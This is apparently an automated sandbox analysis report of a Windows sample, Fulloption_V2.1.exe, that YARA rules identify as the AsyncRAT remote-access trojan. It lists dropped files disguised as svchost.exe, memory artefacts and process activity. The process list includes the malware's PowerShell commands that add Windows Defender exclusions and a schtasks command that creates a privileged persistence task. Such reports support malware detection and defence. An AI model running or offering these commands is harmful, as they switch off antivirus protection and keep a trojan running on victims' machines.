Windows Analysis Report
Fulloption_V2.1.exe

Malicious sample detected (through community Yara rule)

System Summary

Source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\svchost.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6DC3C0	2_2_00007FF6AE6DC3C0
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6D9840	2_2_00007FF6AE6D9840
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6E6160	2_2_00007FF6AE6E6160
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6D8960	2_2_00007FF6AE6D8960
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6F3150	2_2_00007FF6AE6F3150
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6FB940	2_2_00007FF6AE6FB940
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6D8A30	2_2_00007FF6AE6D8A30
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Code function: 2_2_00007FF6AE6DE200	2_2_00007FF6AE6DE200
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD348860C6	3_2_00007FFD348860C6
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD34881719	3_2_00007FFD34881719
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD34886E72	3_2_00007FFD34886E72
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD34881290	3_2_00007FFD34881290
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD348820F1	3_2_00007FFD348820F1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD3488A998	3_2_00007FFD3488A998
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 3_2_00007FFD348810A5	3_2_00007FFD348810A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD348B5EFA	4_2_00007FFD348B5EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD349830E9	4_2_00007FFD349830E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD34898F2A	7_2_00007FFD34898F2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD349630E9	7_2_00007FFD349630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD348B2785	12_2_00007FFD348B2785
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD349830E9	12_2_00007FFD349830E9
Source: C:\ProgramData\svchost.exe	Code function: 19_2_00007FFD348C1719	19_2_00007FFD348C1719
Source: C:\ProgramData\svchost.exe	Code function: 19_2_00007FFD348C20F1	19_2_00007FFD348C20F1
Source: C:\ProgramData\svchost.exe	Code function: 19_2_00007FFD348C1038	19_2_00007FFD348C1038
Source: C:\ProgramData\svchost.exe	Code function: 20_2_00007FFD34891719	20_2_00007FFD34891719
Source: C:\ProgramData\svchost.exe	Code function: 20_2_00007FFD348920F1	20_2_00007FFD348920F1
Source: C:\ProgramData\svchost.exe	Code function: 20_2_00007FFD34891038	20_2_00007FFD34891038

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe 122E3CB0F2AD233D1A364911D433667E7778F00D9A7D10B954C994F4E8093D1F

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Code function: String function: 00007FF6AE82D040 appears 57 times

Source: Fulloption_V2.1.exe, 00000000.00000000.2141314743.0000000000F75000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs Fulloption_V2.1.exe
Source: Fulloption_V2.1.exe, 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe4 vs Fulloption_V2.1.exe
Source: Fulloption_V2.1.exe	Binary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs Fulloption_V2.1.exe

Source: Fulloption_V2.1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\svchost.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: svchost.exe.0.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.3.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.3.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.3.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.3.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.3.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.0.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@22/24@1/2

Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Code function: 2_2_00007FF6AE6D1530 CreateToolhelp32Snapshot,Module32FirstW,_wcsicmp,Module32NextW,CloseHandle,

2_2_00007FF6AE6D1530

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

File created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

Source: C:\ProgramData\svchost.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Mutant created: \Sessions\1\BaseNamedObjects\RXodfPcgOmzjDIlhm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\tXSCfFOlESchkWrE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_03

Source: C:\Users\user\AppData\Roaming\svchost.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Source: Fulloption_V2.1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Fulloption_V2.1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Fulloption_V2.1.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\Fulloption_V2.1.exe "C:\Users\user\Desktop\Fulloption_V2.1.exe"
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
Source: unknown	Process created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: d3dcompiler_43.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: d3dx11_43.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
